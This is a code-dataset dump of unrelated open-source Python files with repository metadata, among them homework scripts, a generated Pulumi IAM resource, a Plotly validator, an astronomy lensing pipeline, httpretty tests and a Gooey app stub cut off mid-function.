cea8f85549e20e56b361532625210c10df856781 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2818/60900/249172.py | 7ab8f518b83de81d5c00a7ebae67bc19775a6307 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | str1 = input()
str2 = input()
data1 = str1.split(" ")
chapter = str2.split(" ")
subject = (int)(data1[0])
time = (int)(data1[1])
total = 0
temp = 0
index = 0
while len(chapter)!=0:
temp = (int)(chapter[0])*time
index = 0
for i in range (0,len(chapter)):
if(temp>(int)(chapter[i])*time):
temp = (int)(chapter[i])*time
index = i
total = total+temp
del chapter[index]
if time!=1:
time = time-1
print(total)
| [
"[email protected]"
] | |
21610adcf332d720d04f4d26788b6caca4289ec7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/200/usersdata/273/81828/submittedfiles/al15.py | 1656fb72d68d08049b3e4bfbe2bfaff5a11427c5 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 83 | py | # -*- coding: utf-8 -*
if numero*0.5=(numero%100) + numero//100:
print(numero)
| [
"[email protected]"
] | |
01d0f066ebccfbcc3429bb92eb4c58c7288e5c33 | ba694353a3cb1cfd02a6773b40f693386d0dba39 | /sdk/python/pulumi_google_native/beyondcorp/v1alpha/client_gateway_iam_member.py | e411f2bc786043e5ec3c549e1882babd6062d57d | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | pulumi/pulumi-google-native | cc57af8bd3d1d6b76f1f48333ed1f1b31d56f92b | 124d255e5b7f5440d1ef63c9a71e4cc1d661cd10 | refs/heads/master | 2023-08-25T00:18:00.300230 | 2023-07-20T04:25:48 | 2023-07-20T04:25:48 | 323,680,373 | 69 | 16 | Apache-2.0 | 2023-09-13T00:28:04 | 2020-12-22T16:39:01 | Python | UTF-8 | Python | false | false | 11,706 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import copy
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ... import iam as _iam
__all__ = ['ClientGatewayIamMemberArgs', 'ClientGatewayIamMember']
@pulumi.input_type
class ClientGatewayIamMemberArgs:
def __init__(__self__, *,
member: pulumi.Input[str],
name: pulumi.Input[str],
role: pulumi.Input[str],
condition: Optional[pulumi.Input['_iam.v1.ConditionArgs']] = None):
"""
The set of arguments for constructing a ClientGatewayIamMember resource.
:param pulumi.Input[str] member: Identity that will be granted the privilege in role. The entry can have one of the following values:
* user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
* serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
* group:{emailid}: An email address that represents a Google group. For example, [email protected].
* domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
:param pulumi.Input[str] name: The name of the resource to manage IAM policies for.
:param pulumi.Input[str] role: The role that should be applied.
:param pulumi.Input['_iam.v1.ConditionArgs'] condition: An IAM Condition for a given binding.
"""
pulumi.set(__self__, "member", member)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "role", role)
if condition is not None:
pulumi.set(__self__, "condition", condition)
@property
@pulumi.getter
def member(self) -> pulumi.Input[str]:
"""
Identity that will be granted the privilege in role. The entry can have one of the following values:
* user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
* serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
* group:{emailid}: An email address that represents a Google group. For example, [email protected].
* domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
"""
return pulumi.get(self, "member")
@member.setter
def member(self, value: pulumi.Input[str]):
pulumi.set(self, "member", value)
@property
@pulumi.getter
def name(self) -> pulumi.Input[str]:
"""
The name of the resource to manage IAM policies for.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: pulumi.Input[str]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def role(self) -> pulumi.Input[str]:
"""
The role that should be applied.
"""
return pulumi.get(self, "role")
@role.setter
def role(self, value: pulumi.Input[str]):
pulumi.set(self, "role", value)
@property
@pulumi.getter
def condition(self) -> Optional[pulumi.Input['_iam.v1.ConditionArgs']]:
"""
An IAM Condition for a given binding.
"""
return pulumi.get(self, "condition")
@condition.setter
def condition(self, value: Optional[pulumi.Input['_iam.v1.ConditionArgs']]):
pulumi.set(self, "condition", value)
class ClientGatewayIamMember(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['_iam.v1.ConditionArgs']]] = None,
member: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Sets the access control policy on the specified resource. Replaces any existing policy. Can return `NOT_FOUND`, `INVALID_ARGUMENT`, and `PERMISSION_DENIED` errors.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[pulumi.InputType['_iam.v1.ConditionArgs']] condition: An IAM Condition for a given binding.
:param pulumi.Input[str] member: Identity that will be granted the privilege in role. The entry can have one of the following values:
* user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
* serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
* group:{emailid}: An email address that represents a Google group. For example, [email protected].
* domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
:param pulumi.Input[str] name: The name of the resource to manage IAM policies for.
:param pulumi.Input[str] role: The role that should be applied.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: ClientGatewayIamMemberArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Sets the access control policy on the specified resource. Replaces any existing policy. Can return `NOT_FOUND`, `INVALID_ARGUMENT`, and `PERMISSION_DENIED` errors.
:param str resource_name: The name of the resource.
:param ClientGatewayIamMemberArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(ClientGatewayIamMemberArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
condition: Optional[pulumi.Input[pulumi.InputType['_iam.v1.ConditionArgs']]] = None,
member: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
role: Optional[pulumi.Input[str]] = None,
__props__=None):
opts = pulumi.ResourceOptions.merge(_utilities.get_resource_opts_defaults(), opts)
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = ClientGatewayIamMemberArgs.__new__(ClientGatewayIamMemberArgs)
__props__.__dict__["condition"] = condition
if member is None and not opts.urn:
raise TypeError("Missing required property 'member'")
__props__.__dict__["member"] = member
if name is None and not opts.urn:
raise TypeError("Missing required property 'name'")
__props__.__dict__["name"] = name
if role is None and not opts.urn:
raise TypeError("Missing required property 'role'")
__props__.__dict__["role"] = role
__props__.__dict__["etag"] = None
__props__.__dict__["project"] = None
super(ClientGatewayIamMember, __self__).__init__(
'google-native:beyondcorp/v1alpha:ClientGatewayIamMember',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'ClientGatewayIamMember':
"""
Get an existing ClientGatewayIamMember resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = ClientGatewayIamMemberArgs.__new__(ClientGatewayIamMemberArgs)
__props__.__dict__["condition"] = None
__props__.__dict__["etag"] = None
__props__.__dict__["member"] = None
__props__.__dict__["name"] = None
__props__.__dict__["project"] = None
__props__.__dict__["role"] = None
return ClientGatewayIamMember(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter
def condition(self) -> pulumi.Output[Optional['_iam.v1.outputs.Condition']]:
"""
An IAM Condition for a given binding. See https://cloud.google.com/iam/docs/conditions-overview for additional details.
"""
return pulumi.get(self, "condition")
@property
@pulumi.getter
def etag(self) -> pulumi.Output[str]:
"""
The etag of the resource's IAM policy.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def member(self) -> pulumi.Output[str]:
"""
Identity that will be granted the privilege in role. The entry can have one of the following values:
* user:{emailid}: An email address that represents a specific Google account. For example, [email protected] or [email protected].
* serviceAccount:{emailid}: An email address that represents a service account. For example, [email protected].
* group:{emailid}: An email address that represents a Google group. For example, [email protected].
* domain:{domain}: A G Suite domain (primary, instead of alias) name that represents all the users of that domain. For example, google.com or example.com.
"""
return pulumi.get(self, "member")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The name of the resource to manage IAM policies for.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def project(self) -> pulumi.Output[str]:
"""
The project in which the resource belongs. If it is not provided, a default will be supplied.
"""
return pulumi.get(self, "project")
@property
@pulumi.getter
def role(self) -> pulumi.Output[str]:
"""
The role that should be applied.
"""
return pulumi.get(self, "role")
| [
"[email protected]"
] | |
c73ec83d2bc16f0e985a6026dd20b6c6936d08f1 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_95/2212.py | d949b82062698cadca5cf074e35b0245522ff71b | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 797 | py | test_input1 = 'ejp mysljylc kd kxveddknmc re jsicpdrysi'
test_input2 = 'rbcpc ypc rtcsra dkh wyfrepkym veddknkmkrkcd'
test_input3 = 'de kr kd eoya kw aej tysr re ujdr lkgc jv'
test_output1 = 'our language is impossible to understand'
test_output2 = 'there are twenty six factorial possibilities'
test_output3 = 'so it is okay if you want to just give up'
mapping = {}
for (x, y) in zip(test_input1, test_output1):
mapping[x] = y
for (x, y) in zip(test_input2, test_output2):
mapping[x] = y
for (x, y) in zip(test_input3, test_output3):
mapping[x] = y
mapping['q'] = 'z'
mapping['z'] = 'q'
ntc = int(raw_input())
for i in xrange(0, ntc):
sentence = list(raw_input())
for j in xrange(0, len(sentence)):
sentence[j] = mapping[sentence[j]]
print 'Case #%d: %s'%(i+1, "".join(sentence))
| [
"[email protected]"
] | |
35e250ddb36f9bda71a9edb9402cff3dc7b06ecd | 1b9075ffea7d4b846d42981b41be44238c371202 | /tags/2007-EOL/applications/multimedia/xsane/actions.py | a5dcf88f3f4b48317cf764f6179f90f66eb3cf6d | [] | no_license | pars-linux/contrib | bf630d4be77f4e484b8c6c8b0698a5b34b3371f4 | 908210110796ef9461a1f9b080b6171fa022e56a | refs/heads/master | 2020-05-26T20:35:58.697670 | 2011-07-11T11:16:38 | 2011-07-11T11:16:38 | 82,484,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,280 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Licensed under the GNU General Public License, version 2.
# See the file http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt
from pisi.actionsapi import autotools
from pisi.actionsapi import pisitools
from pisi.actionsapi import shelltools
from pisi.actionsapi import get
def setup():
pisitools.dosed("src/xsane.h", "# include \"lcms.h\"", "# include \"lcms/lcms.h\"")
shelltools.export("CXXFLAGS", "%s -I/usr/include/lcms" % get.CXXFLAGS())
shelltools.export("LDFLAGS", "%s -L/usr/lib -llcms" % get.LDFLAGS())
autotools.configure("--enable-gtk2 \
--enable-nls \
--enable-jpeg \
--enable-png \
--enable-tiff \
--enable-gimp \
--enable-lcms \
--disable-sanetest \
--disable-gimptest \
--disable-gtktest")
def build():
autotools.make()
def install():
autotools.install()
# Make xsane symlink. Now, it is seen as a plugin in gimp.
pisitools.dosym("/usr/bin/xsane", "/usr/lib/gimp/2.0/plug-ins/xsane")
pisitools.dodoc("xsane.*")
pisitools.removeDir("/usr/sbin")
| [
"[email protected]"
] | |
1697c0111932a0c9cad342f698ed370b0c72284d | a46d135ba8fd7bd40f0b7d7a96c72be446025719 | /packages/python/plotly/plotly/validators/histogram/_outsidetextfont.py | 91c57eed75e3073c405ed483e18e2d95722ed640 | [
"MIT"
] | permissive | hugovk/plotly.py | 5e763fe96f225d964c4fcd1dea79dbefa50b4692 | cfad7862594b35965c0e000813bd7805e8494a5b | refs/heads/master | 2022-05-10T12:17:38.797994 | 2021-12-21T03:49:19 | 2021-12-21T03:49:19 | 234,146,634 | 0 | 0 | MIT | 2020-01-15T18:33:43 | 2020-01-15T18:33:41 | null | UTF-8 | Python | false | false | 1,566 | py | import _plotly_utils.basevalidators
class OutsidetextfontValidator(_plotly_utils.basevalidators.CompoundValidator):
def __init__(
self, plotly_name="outsidetextfont", parent_name="histogram", **kwargs
):
super(OutsidetextfontValidator, self).__init__(
plotly_name=plotly_name,
parent_name=parent_name,
data_class_str=kwargs.pop("data_class_str", "Outsidetextfont"),
data_docs=kwargs.pop(
"data_docs",
"""
color
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The Chart Studio Cloud (at
https://chart-studio.plotly.com or on-premise)
generates images on a server, where only a
select number of fonts are installed and
supported. These include "Arial", "Balto",
"Courier New", "Droid Sans",, "Droid Serif",
"Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
size
""",
),
**kwargs
)
| [
"[email protected]"
] | |
7a3131ae28be4405ce5a794b47ed688f2fecf0cb | 71b11008ab0455dd9fd2c47107f8a27e08febb27 | /04、 python编程/day06/3-code/06-函数的返回值.py | 7adbf30fba433ca7320decfaec8f19bc9ce11693 | [] | no_license | zmh19941223/heimatest2021 | 49ce328f8ce763df0dd67ed1d26eb553fd9e7da4 | 3d2e9e3551a199bda9945df2b957a9bc70d78f64 | refs/heads/main | 2023-08-25T17:03:31.519976 | 2021-10-18T05:07:03 | 2021-10-18T05:07:03 | 418,348,201 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 478 | py | # # 我们没有使用过函数 带返回值
# print("hello python")
# # 对于没有返回值的函数,调用方法,直接函数名(参数)
# # len是有返回值的函数
# a = len("hello python") # 会把一个值返回给调用者
# print(a)
# print(len("hello python"))
def my_sum(a, b):
return a + b # 把a + b 的结果,返回给调用者
num1 = my_sum(2, 3) # 这里就是调用my_sum函数,所以num1得到了函数的返回值
print(num1)
print(my_sum(5, 6)) | [
"[email protected]"
] | |
98d962d303e316845b4a01a0847eb8e0c36ade3c | e75a40843a8738b84bd529a549c45776d09e70d9 | /samples/openapi3/client/petstore/python/test/test_outer_enum.py | aa195260019e50c396a5107af8708f89aed3f908 | [
"Apache-2.0"
] | permissive | OpenAPITools/openapi-generator | 3478dbf8e8319977269e2e84e0bf9960233146e3 | 8c2de11ac2f268836ac9bf0906b8bb6b4013c92d | refs/heads/master | 2023-09-02T11:26:28.189499 | 2023-09-02T02:21:04 | 2023-09-02T02:21:04 | 133,134,007 | 17,729 | 6,577 | Apache-2.0 | 2023-09-14T19:45:32 | 2018-05-12T09:57:56 | Java | UTF-8 | Python | false | false | 816 | py | # coding: utf-8
"""
OpenAPI Petstore
This spec is mainly for testing Petstore server and contains fake endpoints, models. Please do not use this for any other purpose. Special characters: \" \\ # noqa: E501
The version of the OpenAPI document: 1.0.0
Generated by: https://openapi-generator.tech
"""
from __future__ import absolute_import
import unittest
import datetime
import petstore_api
from petstore_api.models.outer_enum import OuterEnum # noqa: E501
from petstore_api.rest import ApiException
class TestOuterEnum(unittest.TestCase):
"""OuterEnum unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testOuterEnum(self):
"""Test OuterEnum"""
inst = OuterEnum("placed")
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
6bbd7506cb05eb4e4065865fdd18cc17fcea1b2b | 8bccc05fcb3cfc6ed93991927a514a96f53f7ec0 | /example_extender/add_mention_dummy_extender.py | de5c32d684d6884597a818c80c3c1a1b17752451 | [
"MIT"
] | permissive | afcarl/QuestionAnsweringGCN | 54101c38549405d65ef22e38fed9e5bd58122ada | e9c1987b40a553f0619fa796f692c8880de32846 | refs/heads/master | 2020-03-20T10:35:55.729170 | 2018-06-07T11:45:12 | 2018-06-07T11:45:12 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,615 | py | import numpy as np
from example_reader.graph_reader.edge_type_utils import EdgeTypeUtils
class AddMentionDummyExtender:
relation_index = None
vertex_index = None
inner = None
def __init__(self, inner, relation_index, vertex_index):
self.inner = inner
self.relation_index = relation_index
self.vertex_index = vertex_index
self.edge_type_utils = EdgeTypeUtils()
def extend(self, example):
example = self.inner.extend(example)
if not example.has_mentions():
return example
mention_vertices = [None]*len(example.mentions)
mention_edges = [None]*len(example.mentions)
graph_vertex_count = example.count_vertices()
for i, mention in enumerate(example.mentions):
mention_vertices[i] = self.vertex_index.index("<mention_dummy>")
mention.dummy_index = graph_vertex_count + i
mention_edges[i] = [mention.dummy_index,
self.relation_index.index("<dummy_to_mention>"),
mention.entity_index]
mention_vertices = np.array(mention_vertices)
mention_vertex_types = np.array([[0, 0, 1, 0, 0, 0] for _ in mention_vertices], dtype=np.float32)
mention_edges = np.array(mention_edges)
example.graph.add_vertices(mention_vertices, mention_vertex_types)
example.graph.edge_types[self.edge_type_utils.index_of("mention_dummy")] = np.arange(len(mention_edges), dtype=np.int32) + example.graph.edges.shape[0]
example.graph.add_edges(mention_edges)
return example
| [
"[email protected]"
] | |
b6df2c47c2e660f59205c497b027827cc1e83442 | 52e83d67c8b76f83278b61a4c0787abebfa2423c | /DeepLense/Shubham Jain/pipelines/beginner/features/redshifts_lens_and_source.py | f7fbc9325206394e42474457af943383399ac661 | [] | no_license | mlsft/gsc_tasks- | 3935142c93cebc978ff35e3f37486438c4dceeed | 84b62aa04f2333d26f8f95a7c0b24c3922bac647 | refs/heads/master | 2022-04-13T16:22:18.054908 | 2020-04-14T11:59:45 | 2020-04-14T11:59:45 | 249,394,940 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,271 | py | import autofit as af
import autolens as al
### PIPELINE DESCRIPTION ###
# In this pipeline, we'll demonstrate passing redshifts to a pipeline - which means that the results and images of this
# pipeline will be returned in physical unit_label (e.g. lengths in kpcs as well as arcsec, luminosities in magnitudes,
# masses in solMass, etc).
# The redshift of the lens and source are input parameters of all pipelines, and they take default values of 0.5 and
# 1.0. Thus, *all* pipelines will return physical values assuming these fiducial values if no other values are
# specified. Care must be taken interpreting the distances and masses if these redshifts are not correct or if the
# true redshifts of the lens and / or source galaxies are unknown.
# We'll perform a basic analysis which fits a lensed source galaxy using a parametric light profile where
# the lens's light is omitted. This pipeline uses two phases:
# Phase 1:
# Description: Fit the lens mass model and source light profile using x1 source.
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: None
# Notes: Inputs the pipeline default redshifts where the lens has redshift 0.5, source 1.0.
# Phase 1:
# Description: Fit the lens and source model again..
# Lens Mass: EllipticalIsothermal + ExternalShear
# Source Light: EllipticalSersic
# Prior Passing: Lens mass (model -> phase 1), source light (model -> phase 1)
# Notes: Manually over-rides the lens redshift to 1.0 and source redshift to 2.0, to illustrate the different results.
def make_pipeline(phase_folders=None, redshift_lens=0.5, redshift_source=1.0):
### SETUP PIPELINE & PHASE NAMES, TAGS AND PATHS ###
# We setup the pipeline name using the tagging module. In this case, the pipeline name is not given a tag and
# will be the string specified below. However, its good practise to use the 'tag.' function below, incase
# a pipeline does use customized tag names.
pipeline_name = "pipeline__feature"
pipeline_tag = "redshifts"
# Unlike other features, the redshifts of the lens and source do not change the setup tag and phase path. Thus,
# our output will simply go to the phase path:
# phase_path = 'phase_name/setup'
# This function uses the phase folders and pipeline name to set up the output directory structure,
# e.g. 'autolens_workspace/output/pipeline_name/pipeline_tag/phase_name/phase_tag//'
phase_folders.append(pipeline_name)
phase_folders.append(pipeline_tag)
### PHASE 1 ###
# In phase 1, we fit the lens galaxy's mass and one source galaxy, where we:
# 1) Use the input value of redshifts from the pipeline.
mass = af.PriorModel(al.mp.EllipticalIsothermal)
mass.centre_0 = af.GaussianPrior(mean=0.0, sigma=0.1)
mass.centre_1 = af.GaussianPrior(mean=0.0, sigma=0.1)
phase1 = al.PhaseImaging(
phase_name="phase_1__x1_source",
phase_folders=phase_folders,
galaxies=dict(
lens=al.GalaxyModel(
redshift=redshift_lens, mass=mass, shear=al.mp.ExternalShear
),
source_0=al.GalaxyModel(
redshift=redshift_source, sersic=al.lp.EllipticalSersic
),
),
)
phase1.optimizer.const_efficiency_mode = True
phase1.optimizer.n_live_points = 80
phase1.optimizer.sampling_efficiency = 0.2
### PHASE 2 ###
# In phase 2, we fit the lens galaxy's mass and two source galaxies, where we:
# 1) Use manually specified new values of redshifts for the lens and source galaxies.
phase2 = al.PhaseImaging(
phase_name="phase_2__x2_source",
phase_folders=phase_folders,
galaxies=dict(
lens=al.GalaxyModel(
redshift=1.0,
mass=phase1.result.model.galaxies.lens.mass,
shear=phase1.result.model.galaxies.lens.shear,
),
source=al.GalaxyModel(
redshift=2.0, sersic=phase1.result.model.galaxies.source.sersic
),
),
)
phase2.optimizer.const_efficiency_mode = True
phase2.optimizer.n_live_points = 50
phase2.optimizer.sampling_efficiency = 0.3
return al.PipelineDataset(pipeline_name, phase1, phase2)
| [
"[email protected]"
] | |
4856bde0b0b864ee66218ab2cf5abb1934f118c2 | 27bdcba25df8b2416783d8a1229bfce08dc77189 | /tests/util/httpretty/test_decorator.py | d2ccd74525dfd97109047417dea28c64ee280b8a | [
"Apache-2.0"
] | permissive | BenjamenMeyer/stackInABox | 5fbeab6aac38c52d5360f9dbabb9101447e32eb5 | 15586e61a2013b6f4997c652e8412a1784f8fc93 | refs/heads/master | 2022-04-01T01:04:33.103603 | 2021-01-09T05:52:55 | 2021-01-09T05:52:55 | 30,074,880 | 5 | 2 | null | null | null | null | UTF-8 | Python | false | false | 6,522 | py | """
Stack-In-A-Box: Basic Test
"""
import collections
import sys
import types
import unittest
import requests
from stackinabox.util.httpretty import decorator
from tests.util import base
from tests.utils.services import AdvancedService
from tests.utils.hello import HelloService
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorErrors(base.UtilTestCase):
def test_basic(self):
decor_instance = decorator.activate('localhost')
with self.assertRaises(TypeError):
decor_instance.process_service({}, raise_on_type=True)
@decorator.stack_activate('localhost', HelloService())
def test_deprecated(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecorator(base.UtilTestCase):
@decorator.activate('localhost', HelloService())
def test_basic(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@decorator.activate('localhost', HelloService(),
200, value='Hello')
def test_basic_with_parameters(self, response_code, value='alpha'):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
@decorator.activate('localhost', HelloService(),
200, value='Hello',
access_services="stack")
def test_basic_with_stack_acccess(self, response_code, value='alpha',
stack=None):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
self.assertEqual(len(stack), 1)
self.assertTrue(self.hello_service.name in stack)
self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyAdvancedWithDecorator(base.UtilTestCase):
@decorator.activate('localhost', AdvancedService())
def test_basic(self):
res = requests.get('http://localhost/advanced/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
res = requests.get('http://localhost/advanced/h')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Good-Bye')
expected_result = {
'bob': 'bob: Good-Bye alice',
'alice': 'alice: Good-Bye bob',
'joe': 'joe: Good-Bye jane'
}
res = requests.get('http://localhost/advanced/g?bob=alice;'
'alice=bob&joe=jane')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.json(), expected_result)
res = requests.get('http://localhost/advanced/1234567890')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'okay')
res = requests.get('http://localhost/advanced/_234567890')
self.assertEqual(res.status_code, 595)
res = requests.put('http://localhost/advanced/h')
self.assertEqual(res.status_code, 405)
res = requests.put('http://localhost/advanced2/i')
self.assertEqual(res.status_code, 597)
def httpretty_generator():
yield HelloService()
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndGenerator(base.UtilTestCase):
def test_verify_generator(self):
self.assertIsInstance(httpretty_generator(), types.GeneratorType)
@decorator.activate(
'localhost',
httpretty_generator()
)
def test_basic(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@decorator.activate(
'localhost',
httpretty_generator(),
200, value='Hello'
)
def test_basic_with_parameters(self, response_code, value='alpha'):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
@decorator.activate(
'localhost',
httpretty_generator(),
200, value='Hello',
access_services="stack"
)
def test_basic_with_stack_acccess(self, response_code, value='alpha',
stack=None):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
self.assertEqual(len(stack), 1)
self.assertTrue(self.hello_service.name in stack)
self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
def httpretty_list():
return [
HelloService()
]
@unittest.skipIf(sys.version_info >= (3, 0), "Httpretty not supported by Py3")
class TestHttprettyBasicWithDecoratorAndList(base.UtilTestCase):
def test_verify_list(self):
self.assertIsInstance(httpretty_list(), collections.Iterable)
@decorator.activate(
'localhost',
httpretty_list()
)
def test_basic(self):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, 200)
self.assertEqual(res.text, 'Hello')
@decorator.activate(
'localhost',
httpretty_list(),
200, value='Hello'
)
def test_basic_with_parameters(self, response_code, value='alpha'):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
@decorator.activate(
'localhost',
httpretty_list(),
200, value='Hello',
access_services="stack"
)
def test_basic_with_stack_acccess(self, response_code, value='alpha',
stack=None):
res = requests.get('http://localhost/hello/')
self.assertEqual(res.status_code, response_code)
self.assertEqual(res.text, value)
self.assertEqual(len(stack), 1)
self.assertTrue(self.hello_service.name in stack)
self.assertIsInstance(stack[list(stack.keys())[0]], HelloService)
| [
"[email protected]"
] | |
44169eb3847ec870ceabdbf7343dc31c946a5041 | ba2eea85cef560c54d5cb4af0e4f2c7c3ee3eb2f | /nesfr3_workspace/catkin_ws/devel/lib/python2.7/dist-packages/hdl_people_tracking/msg/__init__.py | 25469b939f284ee573515fba8efc8d24068cf7de | [] | no_license | HiSeun/nesfr3_selfwork | 0c782597ffd66d736d53ae05594d23fa7f1d9a85 | 855d43117a235462335c6693b334e7a6235d1d31 | refs/heads/master | 2023-02-08T07:33:15.637998 | 2021-01-05T08:48:45 | 2021-01-05T08:48:45 | 326,935,430 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | from ._Cluster import *
from ._ClusterArray import *
from ._Track import *
from ._TrackArray import *
| [
"[email protected]"
] | |
8746be1fd3b410f5feea5dc25408026a13c2840a | b5445f9a1f3597472f47df89696465bca7735406 | /app/program.py | fbad7d4d00617fce1af32fa10d72252d695d045e | [
"MIT"
] | permissive | mikeckennedy/pyramid-web-builder-python-gui | 8af5a4dde9ff1bd6173f789464b67bdaba8bd3fa | d842e116730e9b0ed9daaf1125e1fb6e2b3ea40e | refs/heads/master | 2021-05-03T11:00:32.390158 | 2018-02-17T16:12:56 | 2018-02-17T16:12:56 | 120,542,873 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 2,867 | py | import cookiecutter.main
import sys
from gooey import Gooey, GooeyParser
from utils import to_project_style
@Gooey(
program_name='Pyramid app builder',
program_description='Create a Pyramid web app',
show_success_modal=False,
requires_shell=False)
def main():
info = get_user_values()
proj_dir = build_app(info)
print("Project created: {}".format(proj_dir))
def get_user_values():
parser = GooeyParser()
